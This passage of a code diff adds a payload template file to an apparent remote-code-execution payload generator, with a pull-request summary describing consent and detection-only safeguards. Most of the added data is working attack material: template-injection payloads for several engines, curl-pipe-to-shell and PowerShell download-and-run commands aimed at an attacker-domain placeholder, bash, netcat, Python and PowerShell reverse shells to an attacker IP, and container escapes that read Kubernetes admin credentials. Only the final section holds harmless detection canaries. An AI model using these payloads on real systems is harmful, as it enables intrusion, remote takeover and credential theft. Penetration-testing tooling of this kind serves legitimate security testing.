+                    "Runtime.getRuntime().exec(\"whoami\")",
+                    "new ProcessBuilder(\"whoami\").start()",
+                    "Runtime.getRuntime().exec(\"cat /etc/passwd\")"
+                ],
+                "freemarker_ssti": [
+                    "${7*7}",
+                    "${'freemarker.template.utility.Execute'?new()('id')}",
+                    "<#assign ex = 'freemarker.template.utility.Execute'?new()>${ ex('id')}"
+                ],
+                "velocity_ssti": [
+                    "#set($x='') $x",
+                    "#set($rt=$x.class.forName('java.lang.Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) #set($ex=$rt.getRuntime().exec('id')) $d=$ex.getInputStream() $d=$chr.toChars($d.readBytes($d.available())) $out=$str.valueOf($d) $out"
+                ],
+                "thymeleaf_ssti": [
+                    "[[${7*7}]]",
+                    "[[${T(java.lang.Runtime).getRuntime().exec('id')}]]"
+                ],
+                "deserialization": [
+                    "new ObjectInputStream(new ByteArrayInputStream(payload)).readObject(); // ysoserial gadget"
+                ],
+                "expression": [
+                    "javax.script.ScriptEngineManager m = new javax.script.ScriptEngineManager(); m.getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('id')\");"
+                ]
+            },
+            "dotnet": {
+                "process_start": [
+                    "Process.Start(\"whoami.exe\")",
+                    "Process.Start(\"cmd.exe\", \"/c whoami\")",
+                    "new Process { StartInfo = new ProcessStartInfo { FileName = \"cmd.exe\", Arguments = \"/c whoami\" } }.Start()"
+                ],
+                "deserialize": [
+                    "new BinaryFormatter().Deserialize(new MemoryStream(payload)); // Gadget execution"
+                ]
+            },
+            "ruby": {
+                "kernel_system": [
+                    "system('whoami')",
+                    "`whoami`",
+                    "Kernel.system('whoami')",
+                    "Kernel.exec('whoami')"
+                ],
+                "erb_ssti": [
+                    "<%= 7 * 7 %>",
+                    "<%= `whoami` %>",
+                    "<%= File.open('/etc/passwd').read %>"
+                ]
+            },
+            "perl": {
+                "system_backticks": [
+                    "system('whoami')",
+                    "`whoami`",
+                    "exec('whoami')"
+                ]
+            },
+            "go": {
+                "os_exec": [
+                    "exec.Command(\"whoami\").Output()",
+                    "exec.Command(\"bash\", \"-c\", \"whoami\").Output()",
+                    "exec.Command(\"cat\", \"/etc/passwd\").Output()"
+                ]
+            },
+            "javascript": [
+                "require('child_process').exec('whoami')",
+                "eval(\"require('child_process').exec('whoami')\")"
+            ]
+        },
+        "download_execute": {
+            "unix": [
+                "curl http://{attacker_domain}/shell.sh | sh",
+                "wget http://{attacker_domain}/shell.sh -O /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh",
+                "python3 -c \"import urllib.request; exec(urllib.request.urlopen('http://{attacker_domain}/shell.py').read())\""
+            ],
+            "windows": [
+                "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://{attacker_domain}/shell.ps1')\"",
+                "certutil -urlcache -f http://{attacker_domain}/shell.exe shell.exe && shell.exe"
+            ]
+        },
+        "reverse_shells": {
+            "unix": [
+                "bash -i >& /dev/tcp/{attacker_ip}/443 0>&1",
+                "nc -e /bin/sh {attacker_ip} 443",
+                "python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"{attacker_ip}\",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call([\"/bin/sh\",\"-i\"])'"
+            ],
+            "windows": [
+                "powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('{attacker_ip}',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()\""
+            ]
+        },
+        "container_escape": {
+            "docker": [
+                "cat /proc/1/environ",
+                "nsenter --target 1 --mount --uts --ipc --net --pid /bin/sh",
+                "cp /bin/sh /host/tmp/sh && chmod +s /host/tmp/sh"
+            ],
+            "kubernetes": [
+                "kubectl get pods --namespace kube-system",
+                "kubectl run rce --image=alpine --restart=Never --command -- sh -c 'nc {attacker_ip} 443 -e /bin/sh'",
+                "kubectl exec -n kube-system kube-apiserver-0 -- cat /etc/kubernetes/admin.conf"
+            ]
+        }
+    },
+    "detection_payloads": {
+        "unix": [
+            "echo DETECTION_{canary}",
+            "sleep 5",
+            "printf 'canary:%s' $(hostname)"
+        ],
+        "windows": [
+            "echo DETECTION_{canary}",
+            "timeout /T 5",
+            "powershell -Command \"Start-Sleep -Seconds 3; Write-Output 'DETECTION_{canary}'\""
+        ],
+        "php": [
+            "echo 'DETECTION_{canary}';",
+            "error_log('DETECTION_{canary}');"
+        ],
+        "python": [
+            "print('DETECTION_{canary}')",
+            "import time; time.sleep(2)"
+        ],
+        "nodejs": [
+            "console.log('DETECTION_{canary}')",
+            "setTimeout(()=>console.log('timer {canary}'), 1000)"
+        ],
+        "java": [
+            "System.out.println(\"DETECTION_{canary}\");",
+            "Thread.sleep(2000);"
+        ],
+        "dotnet": [
+            "Console.WriteLine(\"DETECTION_{canary}\");",
+            "System.Threading.Thread.Sleep(2000);"
+        ],
+        "docker": [
+            "echo 'detector:{canary}'",
+            "sleep 2"
+        ],
+        "kubernetes": [
+            "kubectl get pods --namespace default",
+            "echo 'kube-detect-{canary}'"
+        ]
+    }
+}


### PR DESCRIPTION
## Summary
- introduce a JSON/YAML-backed template loader with expanded sinks and container escape payloads
- add detection-only mode, consent acknowledgement, watermarking, and exploitation auditing safeguards
- document the new workflow, flags, and encoding capabilities in the README

## Testing
- python rce_payload_gen.py --detection-only --max-payloads 5 --output /tmp/detect.txt
- python rce_payload_gen.py --acknowledge-consent --max-payloads 2 --output /tmp/exploit2.txt --contexts unix_shell --categories basic_enum --encodings none --environments unix